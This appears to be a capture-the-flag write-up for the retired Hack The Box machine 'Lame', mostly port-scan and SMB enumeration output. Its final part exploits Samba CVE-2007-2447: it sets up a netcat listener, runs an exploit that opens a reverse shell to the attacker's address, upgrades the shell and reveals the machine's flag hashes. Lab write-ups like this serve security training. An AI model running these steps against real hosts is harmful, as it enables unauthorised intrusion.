Hack The Box - Lame
Lame is an easy Linux machine, requiring only one exploit to obtain root access. It was the first machine published on Hack The Box and was often the first machine for new users prior to its retirement.
Difficulty: Easy
OS: Linux
Official Link Machine: Hack The Box Lame
YouTube video for this machine: Terminal Troube - HTB Lame
rustscan –addresses “$TARGET” –top
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
0day was here ♥
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 1073741716'.
Open 10.129.117.112:21
Open 10.129.117.112:22
Open 10.129.117.112:139
Open 10.129.117.112:445
Open 10.129.117.112:3632
[~] Starting Script(s)
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2024-12-16 22:07 CET
Initiating Ping Scan at 22:07
Scanning 10.129.117.112 [4 ports]
Completed Ping Scan at 22:07, 0.07s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 22:07
Scanning lame.htb (10.129.117.112) [5 ports]
Discovered open port 21/tcp on 10.129.117.112
Discovered open port 22/tcp on 10.129.117.112
Discovered open port 3632/tcp on 10.129.117.112
Discovered open port 445/tcp on 10.129.117.112
Discovered open port 139/tcp on 10.129.117.112
Completed SYN Stealth Scan at 22:07, 0.07s elapsed (5 total ports)
Nmap scan report for lame.htb (10.129.117.112)
Host is up, received echo-reply ttl 63 (0.045s latency).
Scanned at 2024-12-16 22:07:33 CET for 0s
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 63
22/tcp open ssh syn-ack ttl 63
139/tcp open netbios-ssn syn-ack ttl 63
445/tcp open microsoft-ds syn-ack ttl 63
3632/tcp open distccd syn-ack ttl 63
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds
Raw packets sent: 9 (372B) | Rcvd: 6 (248B)
enum4linux-ng -A $TARGET
ENUM4LINUX - next generation (v1.3.4)
==========================
| Target Information |
==========================
[*] Target ........... 10.129.117.112
[*] Username ......... ''
[*] Random Username .. 'hnriocui'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)
=======================================
| Listener Scan on 10.129.117.112 |
=======================================
[*] Checking LDAP
[-] Could not connect to LDAP on 389/tcp: timed out
[*] Checking LDAPS
[-] Could not connect to LDAPS on 636/tcp: timed out
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp
=============================================================
| NetBIOS Names and Workgroup/Domain for 10.129.117.112 |
=============================================================
[-] Could not get NetBIOS names information via 'nmblookup': timed out
===========================================
| SMB Dialect Check on 10.129.117.112 |
===========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
SMB 1.0: true
SMB 2.02: false
SMB 2.1: false
SMB 3.0: false
SMB 3.1.1: false
Preferred dialect: SMB 1.0
SMB1 only: true
SMB signing required: false
[*] Enforcing legacy SMBv1 for further enumeration
=============================================================
| Domain Information via SMB session for 10.129.117.112 |
=============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: LAME
NetBIOS domain name: ''
DNS domain: hackthebox.gr
FQDN: lame.hackthebox.gr
Derived membership: workgroup member
Derived domain: unknown
===========================================
| RPC Session Check on 10.129.117.112 |
===========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[-] Could not establish random user session: STATUS_LOGON_FAILURE
=====================================================
| Domain Information via RPC for 10.129.117.112 |
=====================================================
[+] Domain: WORKGROUP
[+] Domain SID: NULL SID
[+] Membership: workgroup member
=================================================
| OS Information via RPC for 10.129.117.112 |
=================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[+] Found OS information via 'srvinfo'
[+] After merging OS information we have the following result:
OS: Linux/Unix (Samba 3.0.20-Debian)
OS version: '4.9'
OS release: not supported
OS build: not supported
Native OS: Unix
Native LAN manager: Samba 3.0.20-Debian
Platform id: '500'
Server type: '0x9a03'
Server type string: Wk Sv PrQ Unx NT SNT lame server (Samba 3.0.20-Debian)
=======================================
| Users via RPC on 10.129.117.112 |
=======================================
[*] Enumerating users via 'querydispinfo'
[+] Found 35 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 35 user(s) via 'enumdomusers'
[+] After merging user results we have 35 user(s) total:
'1000':
username: root
name: root
acb: '0x00000011'
description: (null)
'1002':
username: daemon
name: daemon
acb: '0x00000011'
description: (null)
'1004':
username: bin
name: bin
acb: '0x00000011'
description: (null)
'1006':
username: sys
name: sys
acb: '0x00000011'
description: (null)
'1008':
username: sync
name: sync
acb: '0x00000011'
description: (null)
'1010':
username: games
name: games
acb: '0x00000011'
description: (null)
'1012':
username: man
name: man
acb: '0x00000011'
description: (null)
'1014':
username: lp
name: lp
acb: '0x00000011'
description: (null)
'1016':
username: mail
name: mail
acb: '0x00000011'
description: (null)
'1018':
username: news
name: news
acb: '0x00000011'
description: (null)
'1020':
username: uucp
name: uucp
acb: '0x00000011'
description: (null)
'1026':
username: proxy
name: proxy
acb: '0x00000011'
description: (null)
'1066':
username: www-data
name: www-data
acb: '0x00000011'
description: (null)
'1068':
username: backup
name: backup
acb: '0x00000011'
description: (null)
'1076':
username: list
name: Mailing List Manager
acb: '0x00000011'
description: (null)
'1078':
username: irc
name: ircd
acb: '0x00000011'
description: (null)
'1082':
username: gnats
name: Gnats Bug-Reporting System (admin)
acb: '0x00000011'
description: (null)
'1200':
username: libuuid
name: (null)
acb: '0x00000011'
description: (null)
'1202':
username: dhcp
name: (null)
acb: '0x00000011'
description: (null)
'1204':
username: syslog
name: (null)
acb: '0x00000011'
description: (null)
'1206':
username: klog
name: (null)
acb: '0x00000011'
description: (null)
'1208':
username: sshd
name: (null)
acb: '0x00000011'
description: (null)
'1210':
username: bind
name: (null)
acb: '0x00000011'
description: (null)
'1212':
username: postfix
name: (null)
acb: '0x00000011'
description: (null)
'1214':
username: ftp
name: (null)
acb: '0x00000011'
description: (null)
'1216':
username: postgres
name: PostgreSQL administrator,,,
acb: '0x00000011'
description: (null)
'1218':
username: mysql
name: MySQL Server,,,
acb: '0x00000011'
description: (null)
'1220':
username: tomcat55
name: (null)
acb: '0x00000011'
description: (null)
'1222':
username: distccd
name: (null)
acb: '0x00000011'
description: (null)
'1224':
username: telnetd
name: (null)
acb: '0x00000011'
description: (null)
'1226':
username: proftpd
name: (null)
acb: '0x00000011'
description: (null)
'3000':
username: msfadmin
name: msfadmin,,,
acb: '0x00000010'
description: (null)
'3002':
username: user
name: just a user,111,,
acb: '0x00000010'
description: (null)
'3004':
username: service
name: ',,,'
acb: '0x00000011'
description: (null)
'501':
username: nobody
name: nobody
acb: '0x00000011'
description: (null)
========================================
| Groups via RPC on 10.129.117.112 |
========================================
[*] Enumerating local groups
[+] Found 0 group(s) via 'enumalsgroups domain'
[*] Enumerating builtin groups
[+] Found 0 group(s) via 'enumalsgroups builtin'
[*] Enumerating domain groups
[+] Found 0 group(s) via 'enumdomgroups'
1 hosts + X
========================================
| Shares via RPC on 10.129.117.112 |
========================================
[*] Enumerating shares
[+] Found 5 share(s):
ADMIN$:
comment: IPC Service (lame server (Samba 3.0.20-Debian))
type: IPC
IPC$:
comment: IPC Service (lame server (Samba 3.0.20-Debian))
type: IPC
opt:
comment: ''
type: Disk
print$:
comment: Printer Drivers
type: Disk
tmp:
comment: oh noes!
type: Disk
[*] Testing share ADMIN$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share IPC$
[+] Mapping: OK, Listing: NOT SUPPORTED
[*] Testing share opt
[+] Mapping: DENIED, Listing: N/A
[*] Testing share print$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share tmp
[+] Mapping: OK, Listing: OK
===========================================
| Policies via RPC for 10.129.117.112 |
===========================================
[*] Trying port 445/tcp
[-] SMB connection error on port 445/tcp: STATUS_ACCESS_DENIED
[*] Trying port 139/tcp
[-] SMB connection error on port 139/tcp: STATUS_ACCESS_DENIED
===========================================
| Printers via RPC for 10.129.117.112 |
===========================================
[+] No printers returned (this is not an error)
Completed after 25.29 seconds
Found vulnerable samba version. CVE-2007-2447 | Samba 3.0.20 < 3.0.25rc ‘Username’ map script’ Command Execution
Exploit - https://github.com/TerminalTrouble/CVE-2007-2447
Install python smb librarypip3 install pysmb
Start listenerrlwrap nc -lvnp 1337
Execute exploitpython3 exploit.py $IP 139 10.10.14.149 1337
Upgrade the shell to full ttypython -c 'import pty; pty.spawn("/bin/bash")'
Locate user flag
root@lame:/root# find /home/
find /home/
/home/
/home/service
/home/service/.profile
/home/service/.bashrc
/home/service/.bash_logout
/home/ftp
/home/makis
/home/makis/user.txt
/home/makis/.profile
/home/makis/.sudo_as_admin_successful
/home/makis/.bash_history
/home/makis/.bashrc
/home/makis/.bash_logout
/home/user
/home/user/.ssh
/home/user/.ssh/id_dsa.pub
/home/user/.ssh/id_dsa
/home/user/.profile
/home/user/.bash_history
/home/user/.bashrc
/home/user/.bash_logout
user - /home/makis/user.txt4856f0131ec6755a26b1186dbf2dbb33
root - /root/root.txted2b7155b71d373f2015df9e3c13c06e